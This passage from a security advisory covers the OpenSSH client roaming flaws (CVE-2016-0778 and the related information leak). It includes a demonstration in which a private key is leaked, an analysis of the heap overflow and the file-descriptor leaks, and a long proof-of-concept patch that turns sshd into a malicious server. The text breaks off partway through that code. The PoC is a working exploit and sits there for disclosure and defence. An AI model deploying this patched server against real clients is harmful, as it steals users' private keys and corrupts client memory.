$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz HLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp o9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ /B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy 2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o 6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06 Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr Hiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo /euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa jwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y 3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm qK+cwb7uCSi5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5 r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+ ZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU= -----END RSA PRIVATE KEY-----
env ROAMING="heap_massaging:linux" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 ...
strings /tmp/roaming-a2bbc5f6/infoleak
cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG
strings /tmp/roaming-47b46456/infoleak
RGAcE0nc GCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o 6GEmk/oB9
strings /tmp/roaming-7a6717ae/infoleak
cawMW4LZ1 Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p
strings /tmp/roaming-f3091f08/infoleak
lZ3w0qHe nSolsDs2k8wHbVP4VtLE8l PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ
strings /tmp/roaming-62a9e9a3/infoleak
lZ3w0qHe r3TwTa0pPEk11 LbcsTEJ rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo /euhzdYixxIkfqyopnYFoER26u37/OHe37P
strings /tmp/roaming-8de31ed5/infoleak
7qyvNznQ 26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa
strings /tmp/roaming-f5e0fbcc/infoleak
yESI62wOuaY vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y 3fBC3h9BN5banCw6VKfnvm8/q+bwSxS
strings /tmp/roaming-9be933df/infoleak
QRtzK/GpRuMC1 C3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT
strings /tmp/roaming-ee4d1e6c/infoleak
SG3aTqYp tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s
strings /tmp/roaming-c2bfd69c/infoleak
SG3aTqYp 6JmTOun5zVV6A H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s
strings /tmp/roaming-2b3217a1/infoleak
DGLfFGdO r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ
strings /tmp/roaming-1e275747/infoleak
g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+
======================================================================== Buffer Overflow (CVE-2016-0778) ========================================================================
Analysis
Support for roaming was elegantly added to the OpenSSH client: the calls to read() and write() that communicate with the SSH server were replaced by calls to roaming_read() and roaming_write(), two wrappers that depend on wait_for_roaming_reconnect() to transparently reconnect to the server after a disconnection. The wait_for_roaming_reconnect() routine is essentially a sequence of four subroutines:
239 int 240 wait_for_roaming_reconnect(void) 241 { ... 250 fprintf(stderr, "[connection suspended, press return to resume]"); ... 252 packet_backup_state(); 253 / TODO Perhaps we should read from tty here / 254 while ((c = fgetc(stdin)) != EOF) { ... 259 if (c != '\n' && c != '\r') 260 continue; 261 262 if (ssh_connect(host, &hostaddr, options.port, ... 265 options.proxy_command) == 0 && roaming_resume() == 0) { 266 packet_restore_state(); ... 268 fprintf(stderr, "[connection resumed]\n"); ... 270 return 0; 271 } 272 273 fprintf(stderr, "[reconnect failed, press return to retry]"); ... 275 } 276 fprintf(stderr, "[exiting]\n"); ... 278 exit(0); 279 }
-
packet_backup_state() close()s connection_in and connection_out (the old file descriptors that connected the client to the server), and saves the state of the suspended SSH session (for example, the encryption and decryption contexts).
-
ssh_connect() opens new file descriptors, and connects them to the SSH server.
-
roaming_resume() negotiates the resumption of the suspended SSH session with the server, and calls resend_bytes().
-
packet_restore_state() updates connection_in and connection_out (with the new file descriptors that connect the client to the server), and restores the state of the suspended SSH session.
The new file descriptors for connection_in and connection_out may differ from the old ones (if, for example, files or pipes or sockets are opened or closed between two successive ssh_connect() calls), but unfortunately historical code in OpenSSH assumes that they are constant:
-
In client_loop(), the variables connection_in and connection_out are cached locally, but packet_write_poll() calls roaming_write(), which may assign new values to connection_in and connection_out (if a reconnection occurs), and client_wait_until_can_do_something() subsequently reuses the old, cached values.
-
client_loop() eventually updates these cached values, and the following FD_ISSET() uses a new, updated file descriptor (the fd connection_out), but an old, out-of-date file descriptor set (the fd_set writeset).
-
packet_read_seqnr() (old API, or ssh_packet_read_seqnr(), new API) first calloc()ates setp, a file descriptor set for connection_in; next, it loops around memset(), FD_SET(), select() and roaming_read(); last, it free()s setp and returns. Unfortunately, roaming_read() may reassign a higher value to connection_in (if a reconnection occurs), but setp is never enlarged, and the following memset() and FD_SET() may therefore overflow setp (a heap-based buffer overflow):
1048 int 1049 packet_read_seqnr(u_int32_t seqnr_p) 1050 { .... 1052 fd_set setp; .... 1058 setp = (fd_set )xcalloc(howmany(active_state->connection_in + 1, 1059 NFDBITS), sizeof(fd_mask)); .... 1065 for (;;) { .... 1075 if (type != SSH_MSG_NONE) { 1076 free(setp); 1077 return type; 1078 } .... 1083 memset(setp, 0, howmany(active_state->connection_in + 1, 1084 NFDBITS) * sizeof(fd_mask)); 1085 FD_SET(active_state->connection_in, setp); .... 1092 for (;;) { .... 1097 if ((ret = select(active_state->connection_in + 1, setp, 1098 NULL, NULL, timeoutp)) >= 0) 1099 break; .... 1115 } .... 1117 do { .... 1119 len = roaming_read(active_state->connection_in, buf, 1120 sizeof(buf), &cont); 1121 } while (len == 0 && cont); .... 1130 } 1131 / NOTREACHED */ 1132 }
- packet_write_wait() (old API, or ssh_packet_write_wait(), new API) is basically similar to packet_read_seqnr() and may overflow its own setp if roaming_write() (called by packet_write_poll()) reassigns a higher value to connection_out (after a successful reconnection):
1739 void 1740 packet_write_wait(void) 1741 { 1742 fd_set setp; .... 1746 setp = (fd_set )xcalloc(howmany(active_state->connection_out + 1, 1747 NFDBITS), sizeof(fd_mask)); 1748 packet_write_poll(); 1749 while (packet_have_data_to_write()) { 1750 memset(setp, 0, howmany(active_state->connection_out + 1, 1751 NFDBITS) * sizeof(fd_mask)); 1752 FD_SET(active_state->connection_out, setp); .... 1758 for (;;) { .... 1763 if ((ret = select(active_state->connection_out + 1, 1764 NULL, setp, NULL, timeoutp)) >= 0) 1765 break; .... 1776 } .... 1782 packet_write_poll(); 1783 } 1784 free(setp); 1785 }
Mitigating Factors
This buffer overflow affects all OpenSSH clients >= 5.4, but its impact is significantly reduced by the Mitigating Factors detailed in the Information Leak section, and additionally:
- OpenSSH versions >= 6.8 reimplement packet_backup_state() and packet_restore_state(), but introduce a bug that prevents the buffer overflow from being exploited; indeed, ssh_packet_backup_state() swaps two local pointers, ssh and backup_state, instead of swapping the two global pointers active_state and backup_state:
9 struct ssh active_state, backup_state; ... 238 void 239 packet_backup_state(void) 240 { 241 ssh_packet_backup_state(active_state, backup_state); 242 } 243 244 void 245 packet_restore_state(void) 246 { 247 ssh_packet_restore_state(active_state, backup_state); 248 }
2269 void 2270 ssh_packet_backup_state(struct ssh ssh, 2271 struct ssh backup_state) 2272 { 2273 struct ssh tmp; .... 2279 if (backup_state) 2280 tmp = backup_state; 2281 else 2282 tmp = ssh_alloc_session_state(); 2283 backup_state = ssh; 2284 ssh = tmp; 2285 } .... 2291 void 2292 ssh_packet_restore_state(struct ssh ssh, 2293 struct ssh backup_state) 2294 { 2295 struct ssh tmp; .... 2299 tmp = backup_state; 2300 backup_state = ssh; 2301 ssh = tmp; 2302 ssh->state->connection_in = backup_state->state->connection_in;
As a result, the global pointer backup_state is still NULL when passed to ssh_packet_restore_state(), and crashes the OpenSSH client when dereferenced:
env ROAMING="overflow:A fd_leaks:0" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1
$ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 15 %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Segmentation fault (core dumped)
This bug prevents the buffer overflow from being exploited, but not the information leak, because the vulnerable function resend_bytes() is called before ssh_packet_restore_state() crashes.
File Descriptor Leak
A back-of-the-envelope calculation indicates that, in order to increase the file descriptor connection_in or connection_out, and thus overflow the file descriptor set setp in packet_read_seqnr() or packet_write_wait(), a file descriptor leak is needed:
-
First, the number of bytes calloc()ated for setp is rounded up to the nearest multiple of sizeof(fd_mask): 8 bytes (or 64 file descriptors) on 64-bit systems.
-
Next, in glibc, this number is rounded up to the nearest multiple of MALLOC_ALIGNMENT: 16 bytes (or 128 file descriptors) on 64-bit systems.
-
Last, in glibc, a MIN_CHUNK_SIZE is enforced: 32 bytes on 64-bit systems, of which 24 bytes (or 192 file descriptors) are reserved for setp.
-
In conclusion, a file descriptor leak is needed, because connection_in or connection_out has to be increased by hundreds in order to overflow setp.
The search for a suitable file descriptor leak begins with a study of the behavior of the four ssh_connect() methods, when called for a reconnection by wait_for_roaming_reconnect():
- The default method ssh_connect_direct() communicates with the server through a simple TCP socket: the two file descriptors connection_in and connection_out are both equal to this socket's file descriptor.
In wait_for_roaming_reconnect(), the low-numbered file descriptor of the old TCP socket is close()d by packet_backup_state(), but immediately reused for the new TCP socket in ssh_connect_direct(): the new file descriptors connection_in and connection_out are equal to this old, low-numbered file descriptor, and cannot possibly overflow setp.
-
The special ProxyCommand "-" communicates with the server through stdin and stdout, but (as explained in the Mitigating Factors of the Information Leak section) it cannot possibly reconnect to the server, and is therefore immune to this buffer overflow.
-
Surprisingly, we discovered a file descriptor leak in the ssh_proxy_fdpass_connect() method itself; indeed, the file descriptor sp[1] is never close()d:
101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 106 int sp[2], sock; ... 113 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) < 0) 114 fatal("Could not create socketpair to communicate with " 115 "proxy dialer: %.100s", strerror(errno)); ... 161 close(sp[0]); ... 164 if ((sock = mm_receive_fd(sp[1])) == -1) 165 fatal("proxy dialer did not pass back a connection"); ... 171 / Set the connection file descriptors. / 172 packet_set_connection(sock, sock); 173 174 return 0; 175 }
However, two different reasons prevent this file descriptor leak from triggering the setp overflow:
- The method ssh_proxy_fdpass_connect() communicates with the server through a single socket received from the ProxyCommand: the two file descriptors connection_in and connection_out are both equal to this socket's file descriptor.
In wait_for_roaming_reconnect(), the low-numbered file descriptor of the old socket is close()d by packet_backup_state(), reused for sp[0] in ssh_proxy_fdpass_connect(), close()d again, and eventually reused again for the new socket: the new file descriptors connection_in and connection_out are equal to this old, low-numbered file descriptor, and cannot possibly overflow setp.
-
Because of the waitpid() bug described in the Mitigating Factors of the Information Leak section, the method ssh_proxy_fdpass_connect() calls fatal() before it returns to wait_for_roaming_reconnect(), and is therefore immune to this buffer overflow.
-
The method ssh_proxy_connect() communicates with the server through a ProxyCommand and two different pipes: the file descriptor connection_in is the read end of the second pipe (pout[0]), and the file descriptor connection_out is the write end of the first pipe (pin[1]):
180 static int 181 ssh_proxy_connect(const char host, u_short port, const char proxy_command) 182 { ... 184 int pin[2], pout[2]; ... 192 if (pipe(pin) < 0 || pipe(pout) < 0) 193 fatal("Could not create pipes to communicate with the proxy: %.100s", 194 strerror(errno)); ... 240 / Close child side of the descriptors. / 241 close(pin[0]); 242 close(pout[1]); ... 247 / Set the connection file descriptors. / 248 packet_set_connection(pout[0], pin[1]); 249 250 / Indicate OK return / 251 return 0; 252 }
In wait_for_roaming_reconnect(), the two old, low-numbered file descriptors connection_in and connection_out are both close()d by packet_backup_state(), and immediately reused for the pipe(pin) in ssh_proxy_connect(): the new connection_out (pin[1]) is equal to one of these old, low-numbered file descriptors, and cannot possibly overflow setp.
On the other hand, the pipe(pout) in ssh_proxy_connect() may return high-numbered file descriptors, and the new connection_in (pout[0]) may therefore overflow setp, if hundreds of file descriptors were leaked before the call to wait_for_roaming_reconnect():
- We discovered a file descriptor leak in the pubkey_prepare() function of OpenSSH >= 6.8; indeed, if the client is running an authentication agent that does not offer any private keys, the reference to agent_fd is lost, and this file descriptor is never close()d:
1194 static void 1195 pubkey_prepare(Authctxt *authctxt) 1196 { .... 1200 int agent_fd, i, r, found; .... 1247 if ((r = ssh_get_authentication_socket(&agent_fd)) != 0) { 1248 if (r != SSH_ERR_AGENT_NOT_PRESENT) 1249 debug("%s: ssh_get_authentication_socket: %s", 1250 func, ssh_err(r)); 1251 } else if ((r = ssh_fetch_identitylist(agent_fd, 2, &idlist)) != 0) { 1252 if (r != SSH_ERR_AGENT_NO_IDENTITIES) 1253 debug("%s: ssh_fetch_identitylist: %s", 1254 func, ssh_err(r)); 1255 } else { .... 1288 authctxt->agent_fd = agent_fd; 1289 } .... 1299 }
However, OpenSSH clients >= 6.8 crash in ssh_packet_restore_state() (because of the NULL-pointer dereference discussed in the Mitigating Factors of the Buffer Overflow section) and are immune to the setp overflow, despite this agent_fd leak.
- If ForwardAgent (-A) or ForwardX11 (-X) is enabled in the OpenSSH client (it is disabled by default), a malicious SSH server can request hundreds of forwardings, in order to increase connection_in (each forwarding opens a file descriptor), and thus overflow setp in packet_read_seqnr():
env ROAMING="overflow:A" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014
$ /usr/bin/ssh-agent -- /usr/bin/ssh -A -o ProxyCommand="/usr/bin/socat - TCP4:%h:%p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed] *** Error in `/usr/bin/ssh': free(): invalid next size (fast): 0x00007f0474d03e70 *** Aborted (core dumped)
env ROAMING="overflow:X" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ /usr/bin/ssh -X -o ProxyCommand="/usr/bin/socat - TCP4:%h:%p" -p 222 127.0.0.1
user@127.0.0.1's password:
[connection suspended, press return to resume][connection resumed]
*** Error in /usr/bin/ssh': free(): invalid next size (fast): 0x00007fdcc2a3aba0 ***
*** Error in
/usr/bin/ssh': malloc(): memory corruption: 0x00007fdcc2a3abc0 ***
Finally, a brief digression on two unexpected problems that had to be solved in our proof-of-concept:
-
First, setp can be overflowed only in packet_read_seqnr(), not in packet_write_wait(), but agent forwarding and X11 forwarding are post- authentication functionalities, and post-authentication calls to packet_read() or packet_read_expect() are scarce, except in the key-exchange code of OpenSSH clients < 6.8: our proof-of-concept effectively forces a rekeying in order to overflow setp in packet_read_seqnr().
-
Second, after a successful reconnection, packet_read_seqnr() may call fatal("Read from socket failed: %.100s", ...), because roaming_read() may return EAGAIN (EAGAIN is never returned without the reconnection, because the preceding call to select() guarantees that connection_in is ready for read()). Our proof-of-concept works around this problem by forcing the client to resend MAX_ROAMBUF bytes (2M) to the server, allowing data to reach the client before roaming_read() is called, thus avoiding EAGAIN.
======================================================================== Acknowledgments ========================================================================
We would like to thank the OpenSSH developers for their great work and their incredibly quick response, Red Hat Product Security for promptly assigning CVE-IDs to these issues, and Alexander Peslyak of the Openwall Project for the interesting discussions.
======================================================================== Proof Of Concept ========================================================================
diff -pruN openssh-6.4p1/auth2-pubkey.c openssh-6.4p1+roaming/auth2-pubkey.c --- openssh-6.4p1/auth2-pubkey.c 2013-07-17 23:10:10.000000000 -0700 +++ openssh-6.4p1+roaming/auth2-pubkey.c 2016-01-07 01:04:15.000000000 -0800 @@ -169,7 +169,9 @@ userauth_pubkey(Authctxt authctxt) * if a user is not allowed to login. is this an * issue? -markus / - if (PRIVSEP(user_key_allowed(authctxt->pw, key))) { + if (PRIVSEP(user_key_allowed(authctxt->pw, key)) || 1) { + debug("%s: force client-side load_identity_file", + func); packet_start(SSH2_MSG_USERAUTH_PK_OK); packet_put_string(pkalg, alen); packet_put_string(pkblob, blen); diff -pruN openssh-6.4p1/kex.c openssh-6.4p1+roaming/kex.c --- openssh-6.4p1/kex.c 2013-06-01 14:31:18.000000000 -0700 +++ openssh-6.4p1+roaming/kex.c 2016-01-07 01:04:15.000000000 -0800 @@ -442,6 +442,73 @@ proposals_match(char *my[PROPOSAL_MAX], }
static void +roaming_reconnect(void) +{ + packet_read_expect(SSH2_MSG_KEX_ROAMING_RESUME); + const u_int id = packet_get_int(); / roaming_id / + debug("%s: id %u", func, id); + packet_check_eom(); + + const char const dir = get_roaming_dir(id); + debug("%s: dir %s", func, dir); + const int fd = open(dir, O_RDONLY | O_NOFOLLOW | O_NONBLOCK); + if (fd <= -1) + fatal("%s: open %s errno %d", func, dir, errno); + if (fchdir(fd) != 0) + fatal("%s: fchdir %s errno %d", func, dir, errno); + if (close(fd) != 0) + fatal("%s: close %s errno %d", func, dir, errno); + + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_REQUIRED); + packet_put_int64(arc4random()); / chall / + packet_put_int64(arc4random()); / oldchall / + packet_send(); + + packet_read_expect(SSH2_MSG_KEX_ROAMING_AUTH); + const u_int64_t client_read_bytes = packet_get_int64(); + debug("%s: client_read_bytes %llu", func, + (unsigned long long)client_read_bytes); + packet_get_int64(); / digest (1-8) / + packet_get_int64(); / digest (9-16) / + packet_get_int(); / digest (17-20) / + packet_check_eom(); + + u_int64_t client_write_bytes; + size_t len = sizeof(client_write_bytes); + load_roaming_file("client_write_bytes", &client_write_bytes, &len); + debug("%s: client_write_bytes %llu", func, + (unsigned long long)client_write_bytes); + + u_int client_out_buf_size; + len = sizeof(client_out_buf_size); + load_roaming_file("client_out_buf_size", &client_out_buf_size, &len); + debug("%s: client_out_buf_size %u", func, client_out_buf_size); + if (client_out_buf_size <= 0 || client_out_buf_size > MAX_ROAMBUF) + fatal("%s: client_out_buf_size %u", func, + client_out_buf_size); + + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_OK); + packet_put_int64(client_write_bytes - (u_int64_t)client_out_buf_size); + packet_send(); + const int overflow = (access("output", F_OK) == 0); + if (overflow != 0) { + const void const ptr = load_roaming_file("output", NULL, &len); + buffer_append(packet_get_output(), ptr, len); + } + packet_write_wait(); + + char const client_out_buf = xmalloc(client_out_buf_size); + if (atomicio(read, packet_get_connection_in(), client_out_buf, + client_out_buf_size) != client_out_buf_size) + fatal("%s: read client_out_buf_size %u errno %d", func, + client_out_buf_size, errno); + if (overflow == 0) + dump_roaming_file("infoleak", client_out_buf, + client_out_buf_size); + fatal("%s: all done for %s", func, dir); +} + +static void kex_choose_conf(Kex kex) { Newkeys newkeys; @@ -470,6 +537,10 @@ kex_choose_conf(Kex kex) kex->roaming = 1; free(roaming); } + } else if (strcmp(peer[PROPOSAL_KEX_ALGS], KEX_RESUME) == 0) { + roaming_reconnect(); + / NOTREACHED / + fatal("%s: returned from %s", func, KEX_RESUME); }
/* Algorithm Negotiation */
diff -pruN openssh-6.4p1/roaming.h openssh-6.4p1+roaming/roaming.h --- openssh-6.4p1/roaming.h 2011-12-18 15:52:52.000000000 -0800 +++ openssh-6.4p1+roaming/roaming.h 2016-01-07 01:04:15.000000000 -0800 @@ -42,4 +42,86 @@ void resend_bytes(int, u_int64_t ); void calculate_new_key(u_int64_t , u_int64_t, u_int64_t); int resume_kex(void);
+#include
+static int client_session_channel = -1; +static int server_session_channel = -1; + static void server_input_channel_open(int type, u_int32_t seq, void ctxt) { @@ -1089,12 +1092,22 @@ server_input_channel_open(int type, u_in c->remote_window = rwindow; c->remote_maxpacket = rmaxpack; if (c->type != SSH_CHANNEL_CONNECTING) { + debug("%s: avoid client-side buf_append", func); + / packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); packet_put_int(c->remote_id); packet_put_int(c->self); packet_put_int(c->local_window); packet_put_int(c->local_maxpacket); packet_send(); + */ + if (strcmp(ctype, "session") == 0) { + if (client_session_channel != -1) + fatal("%s: client_session_channel %d", + func, client_session_channel); + client_session_channel = c->remote_id; + server_session_channel = c->self; + } } } else { debug("server_input_channel_open: failure %s", ctype); @@ -1111,6 +1124,196 @@ server_input_channel_open(int type, u_in }
static void +roaming_disconnect(Kex const kex) +{ + const char cp, roaming = getenv("ROAMING"); + if (roaming == NULL) + roaming = "infoleak"; + int overflow = 0; + if ((cp = strstr(roaming, "overflow:")) != NULL) + overflow = cp[9]; + + const u_int client_recv_buf_size = packet_get_int(); + packet_check_eom(); + const u_int server_recv_buf_size = get_recv_buf_size(); + const u_int server_send_buf_size = get_snd_buf_size(); + debug("%s: client_recv_buf_size %u", func, client_recv_buf_size); + debug("%s: server_recv_buf_size %u", func, server_recv_buf_size); + debug("%s: server_send_buf_size %u", func, server_send_buf_size); + + u_int client_send_buf_size = 0; + if ((cp = strstr(roaming, "client_send_buf_size:")) != NULL) + client_send_buf_size = strtoul(cp + 21, NULL, 0); + else if (client_recv_buf_size == DEFAULT_ROAMBUF) + client_send_buf_size = DEFAULT_ROAMBUF; + else { + const u_int + max = MAX(client_recv_buf_size, server_recv_buf_size), + min = MIN(client_recv_buf_size, server_recv_buf_size); + if (min <= 0) + fatal("%s: min %u", func, min); + if (((u_int64_t)(max - min) * 1024) / min < 1) + client_send_buf_size = server_send_buf_size; + else + client_send_buf_size = client_recv_buf_size; + } + debug("%s: client_send_buf_size %u", func, client_send_buf_size); + if (client_send_buf_size <= 0) + fatal("%s: client_send_buf_size", func); + + u_int id = 0; + char dir = NULL; + for (;;) { + id = arc4random(); + debug("%s: id %u", func, id); + free(dir); + dir = get_roaming_dir(id); + if (mkdir(dir, S_IRWXU) == 0) + break; + if (errno != EEXIST) + fatal("%s: mkdir %s errno %d", func, dir, errno); + } + debug("%s: dir %s", func, dir); + if (chdir(dir) != 0) + fatal("%s: chdir %s errno %d", func, dir, errno); + + u_int client_out_buf_size = 0; + if ((cp = strstr(roaming, "client_out_buf_size:")) != NULL) + client_out_buf_size = strtoul(cp + 20, NULL, 0); + else if (overflow != 0) + client_out_buf_size = MAX_ROAMBUF; + else + client_out_buf_size = 1 + arc4random() % 4096; + debug("%s: client_out_buf_size %u", func, client_out_buf_size); + if (client_out_buf_size <= 0) + fatal("%s: client_out_buf_size", func); + dump_roaming_file("client_out_buf_size", &client_out_buf_size, + sizeof(client_out_buf_size)); + + if ((cp = strstr(roaming, "scp_mode")) != NULL) { + if (overflow != 0) + fatal("%s: scp_mode is incompatible with overflow %d", + func, overflow); + + u_int seconds_left_to_sleep = 3; + if ((cp = strstr(cp, "sleep:")) != NULL) + seconds_left_to_sleep = strtoul(cp + 6, NULL, 0); + debug("%s: sleep %u", func, seconds_left_to_sleep); + + if (client_session_channel == -1) + fatal("%s: client_session_channel %d", + func, client_session_channel); + + packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); + packet_put_int(client_session_channel); + packet_put_int(server_session_channel); + packet_put_int(0); / server window / + packet_put_int(0); / server maxpacket / + packet_send(); + + packet_start(SSH2_MSG_CHANNEL_DATA); + packet_put_int(client_session_channel); + packet_put_string("\0\n", 2); / response&source|sink&run_err / + packet_send(); + + packet_read_expect(SSH2_MSG_CHANNEL_REQUEST); + packet_get_int(); / server channel / + debug("%s: channel request %s", func, + packet_get_cstring(NULL)); + + while (seconds_left_to_sleep) + seconds_left_to_sleep = sleep(seconds_left_to_sleep); + } + + packet_start(SSH2_MSG_REQUEST_SUCCESS); + packet_put_int(id); / roaming_id / + packet_put_int64(arc4random()); / cookie / + packet_put_int64(0); / key1 / + packet_put_int64(0); / key2 / + packet_put_int(client_out_buf_size - client_send_buf_size); + packet_send(); + packet_write_wait(); + + if (overflow != 0) { + const u_int64_t full_client_out_buf = get_recv_bytes() + + client_out_buf_size; + + u_int fd_leaks = 4 * 8 * 8; / MIN_CHUNK_SIZE in bits / + if ((cp = strstr(roaming, "fd_leaks:")) != NULL) + fd_leaks = strtoul(cp + 9, NULL, 0); + debug("%s: fd_leaks %u", func, fd_leaks); + + while (fd_leaks--) { + packet_start(SSH2_MSG_CHANNEL_OPEN); + packet_put_cstring(overflow == 'X' ? "x11" : + "auth-agent@openssh.com"); / ctype / + packet_put_int(arc4random()); / server channel / + packet_put_int(arc4random()); / server window / + packet_put_int(arc4random()); / server maxpacket / + if (overflow == 'X') { + packet_put_cstring(""); / originator / + packet_put_int(arc4random()); / port / + } + packet_send(); + + packet_read_expect(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); + packet_get_int(); / server channel / + packet_get_int(); / client channel / + packet_get_int(); / client window / + packet_get_int(); / client maxpacket / + packet_check_eom(); + } + + while (get_recv_bytes() <= full_client_out_buf) { + packet_start(SSH2_MSG_GLOBAL_REQUEST); + packet_put_cstring(""); / rtype / + packet_put_char(1); / want_reply / + packet_send(); + + packet_read_expect(SSH2_MSG_REQUEST_FAILURE); + packet_check_eom(); + } + + if (kex == NULL) + fatal("%s: no kex, cannot rekey", func); + if (kex->flags & KEX_INIT_SENT) + fatal("%s: KEX_INIT_SENT already", func); + char const ptr = buffer_ptr(&kex->my); + const u_int len = buffer_len(&kex->my); + if (len <= 1+4) / first_kex_follows + reserved / + fatal("%s: kex len %u", func, len); + ptr[len - (1+4)] = 1; / first_kex_follows / + kex_send_kexinit(kex); + + u_int i; + packet_read_expect(SSH2_MSG_KEXINIT); + for (i = 0; i < KEX_COOKIE_LEN; i++) + packet_get_char(); + for (i = 0; i < PROPOSAL_MAX; i++) + free(packet_get_string(NULL)); + packet_get_char(); / first_kex_follows / + packet_get_int(); / reserved / + packet_check_eom(); + + char buf[81922]; / two packet_read_seqnr bufferfuls / + memset(buf, '\0', sizeof(buf)); + 